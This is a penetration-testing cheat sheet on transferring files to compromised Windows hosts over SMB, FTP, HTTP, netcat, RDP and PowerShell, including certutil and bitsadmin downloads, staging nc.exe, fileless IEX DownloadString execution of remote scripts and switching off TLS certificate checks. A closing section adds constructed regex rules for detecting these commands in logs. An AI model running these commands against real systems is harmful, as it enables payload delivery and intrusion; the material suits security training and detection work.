CONNECTING TO AN SMB SHARE USING POWERSHELL
- Set Up an SMB Server with Credentials
sudo impacket-smbserver hackfast $(pwd) -smb2support -user hackfast -password hackfast
- Convert Password to Secure String
$pass = convertto-securestring 'hackfast' -AsPlainText -Force
- Create Credential Object
$cred = New-Object System.Management.Automation.PSCredential('hackfast',$pass)
- Map the Network Drive
New-PSDrive -Name hackfast -PSProvider FileSystem -Credential $cred -Root \\[IP-ADDRESS]\hackfast
- Navigate to the Mapped Drive
cd hackfast:
DOWNLOADING FILES VIA SMB (NO CREDENTIALS)
- Set Up an SMB Server
sudo impacket-smbserver share -smb2support .
- Download a File from SMB Server:
copy \\[IP-ADDRESS]\share\file.txt .
DOWNLOADING FILES VIA SMB (WITH CREDENTIALS)
- Configure SMB Server Using impacket-smbserver
sudo impacket-smbserver hackfast $(pwd) -smb2support -user hackfast -password hackfast
- Configure SMB Server Using smbserver.py
smbserver.py hackfast . -smb2support -username hackfast -password hackfast
- Map a Network Drive
net use z: \\[IP-ADDRESS]\hackfast /user:hackfast hackfast
- Copy a File from the Mapped Drive
copy z:\file.txt .
DOWNLOADING FILES VIA FTP
- Start an FTP Server:
sudo python3 -m pyftpdlib --port 21
- Downloading a File Using PowerShell
(New-Object Net.WebClient).DownloadFile('ftp://[IP-ADDRESS]/file.txt', 'C:\Users\Public\file.txt')
- Automate FTP Downloads with Command File:
SETTING UP AN HTTP SERVER AND DOWNLOADING FILES USING PYTHON 2
- Start an HTTP server:
python -m SimpleHTTPServer 8000
- Download File Using PowerShell:
powershell iwr -uri http://[IP-ADDRESS]:8000/file.txt -outfile file.txt
- Download File Using certutil
certutil -urlcache -f http://[IP-ADDRESS]:8000/file.txt file.txt
- Download File Using bitsadmin
bitsadmin /transfer debjob /download /priority normal http://[IP-ADDRESS]:8000/file.txt C:\Users\Public\file.txt
SETTING UP AN HTTP SERVER AND DOWNLOADING FILES USING PYTHON 3
- Start an HTTP server:
python3 -m http.server 8000
- Download File Using PowerShell:
powershell iwr -uri http://[IP-ADDRESS]:8000/file.txt -outfile file.txt
- Download File Using certutil
certutil -urlcache -f http://[IP-ADDRESS]:8000/file.txt file.txt
- Download File Using bitsadmin
bitsadmin /transfer debjob /download /priority normal http://[IP-ADDRESS]:8000/file.txt C:\Users\Public\file.txt
SETTING UP HTTP SERVER AND FILE DOWNLOAD USING PHP
- Start an HTTP server:
php -S 0.0.0.0:8000
- Download File Using PowerShell:
powershell iwr -uri http://[IP-ADDRESS]:8000/file.txt -outfile file.txt
- Download File Using certutil
certutil -urlcache -f http://[IP-ADDRESS]:8000/file.txt file.txt
- Download File Using bitsadmin
bitsadmin /transfer debjob /download /priority normal http://[IP-ADDRESS]:8000/file.txt C:\Users\Public\file.txt
SETTING UP HTTP SERVER AND FILE DOWNLOAD USING RUBY
- Start an HTTP Server:
ruby -run -e httpd . -p 8000
- Download File Using PowerShell:
powershell iwr -uri http://[IP-ADDRESS]:8000/file.txt -outfile file.txt
- Download File Using certutil
certutil -urlcache -f http://[IP-ADDRESS]:8000/file.txt file.txt
- Download File Using bitsadmin
bitsadmin /transfer debjob /download /priority normal http://[IP-ADDRESS]:8000/file.txt C:\Users\Public\file.txt
SETTING UP AN APACHE SERVER AND FILE DOWNLOAD
- Place File into the Apache Web Directory:
cp nc.exe /var/www/html
- Start the Apache Server:
sudo systemctl start apache2
- Downloading a File via Web Browser or PowerShell
Invoke-WebRequest -Uri http://[IP-ADDRESS]/file.txt -OutFile file.txt
ENCODING AND DECODING FILE WITH BASE64
- Generate MD5 checksum:
md5sum file.txt
- Encoding File Content to Base64
cat file.txt | base64 -w 0; echo
- Decoding Base64 Content on Windows
[IO.File]::WriteAllBytes("C:\Temp\file.txt", [Convert]::FromBase64String("[BASE64-STRING]"))
- Verify the MD5 checksum of the decoded file:
Get-FileHash C:\Temp\file.txt -Algorithm MD5
DOWNLOADING FILES FROM A REMOTE SESSION
- Create a PowerShell Remoting session:
$Session = New-PSSession -ComputerName DATABASE01
- Copy the file from the remote session to your local machine:
Copy-Item -Path "C:\Users\Administrator\Desktop\file.txt" -Destination C:\ -FromSession $Session
FILE TRANSFERS WITH NETCAT AND NCAT
- Downloading a File (Receiving)
- Using Netcat On the Compromised Machine (Listening):
nc -l -p 8000 > received_file.exe
- On the Attack Host (Sending):
- Using Netcat
nc -q 0 [IP-ADDRESS] 8000 < file.exe
- Using Ncat
ncat --send-only [IP-ADDRESS] 8000 < file.exe
DOWNLOADING FILES VIA RDP (LINUX TO WINDOWS)
- Using rdesktop for File Transfer
rdesktop [IP-ADDRESS] -d [DOMAIN] -u [USERNAME] -p '[PASSWORD]' -r disk:linux='/home/user/rdesktop/files'
- Using xfreerdp for File Transfer
xfreerdp /v:[IP-ADDRESS] /d:[DOMAIN] /u:[USERNAME] /p:'[PASSWORD]' /drive:[NAME],[PATH]
- Accessing Mounted Directory in RDP Session
Connect to \\tsclient\ within the RDP session to transfer files to and from the mounted directory.
POWERSHELL WEB DOWNLOADS
- Downloading Files Using DownloadFile Method
(New-Object Net.WebClient).DownloadFile('http://[IP-ADDRESS]:8000/file.ps1','C:\Temp\file.ps1')
- Using DownloadFileAsync for Non-Blocking Downloads
(New-Object Net.WebClient).DownloadFileAsync('http://[IP-ADDRESS]:8000/file.ps1', 'C:\Temp\file.ps1')
- Executing Fileless Downloads Using DownloadString
IEX (New-Object Net.WebClient).DownloadString('http://[IP-ADDRESS]:8000/file.ps1')
- Downloading File Using Invoke-WebRequest
Invoke-WebRequest http://[IP-ADDRESS]:8000/file.ps1 -OutFile C:\Temp\file.ps1
- Bypassing Internet Explorer Configuration
Invoke-WebRequest http://[IP-ADDRESS]:8000/file.ps1 -UseBasicParsing
- Bypassing SSL/TLS Secure Channel Issues:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
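
DETECTING THESE DOWNLOAD COMMANDS IN LOGS (ADDED EXAMPLE)
The Windows-side download commands listed on this page leave recognisable command lines in process-creation and PowerShell script-block logs. The following is an added example, not part of the original cheat sheet: the rule names, the scan/classify helpers and the sample events (hosts WS01-WS03, documentation address 192.0.2.10) are all constructed for illustration.

```python
import re

# Regexes for the Windows-side download commands listed on this page.
RULES = {
    "certutil_urlcache": r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://",
    "bitsadmin_transfer": r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://",
    "webclient_download": r"net\.webclient\)?\s*\.\s*download(file|fileasync|string)\b",
    "iex_downloadstring": r"\b(iex|invoke-expression)\b.*\bdownloadstring\b",
    "invoke_webrequest": r"\b(iwr|invoke-webrequest)\b.*https?://",
    # Certificate validation switched off for the whole PowerShell process.
    "tls_validation_off": r"servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}
REMOTE = re.compile(r"(?:https?|ftp)://([^/\s'\":]+)", re.I)

def classify(cmdline):
    """Return (sorted names of matching rules, remote host or None)."""
    hits = sorted(n for n, rx in COMPILED.items() if rx.search(cmdline))
    m = REMOTE.search(cmdline)
    return hits, (m.group(1) if m else None)

def scan(events):
    """events: iterable of (hostname, command line); return flagged ones only."""
    findings = []
    for host, cmdline in events:
        hits, remote = classify(cmdline)
        if hits:
            findings.append({"host": host, "rules": hits, "remote": remote})
    return findings

# Constructed sample events, shaped like process-creation command lines
# or PowerShell script-block text exported from a log pipeline.
SAMPLE_EVENTS = [
    ("WS01", r"certutil -urlcache -f http://192.0.2.10:8000/file.txt file.txt"),
    ("WS01", r"bitsadmin /transfer debjob /download /priority normal "
             r"http://192.0.2.10:8000/file.txt C:\Users\Public\file.txt"),
    ("WS02", r"powershell IEX (New-Object Net.WebClient)"
             r".DownloadString('http://192.0.2.10:8000/file.ps1')"),
    ("WS02", r"powershell iwr -uri http://192.0.2.10:8000/file.txt -outfile file.txt"),
    ("WS03", r"certutil -hashfile C:\Temp\file.txt MD5"),  # benign: no download
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Invoke-WebRequest and WebClient are also used by legitimate administration scripts, so the remote host and the parent process are what turn a match into a finding worth triaging.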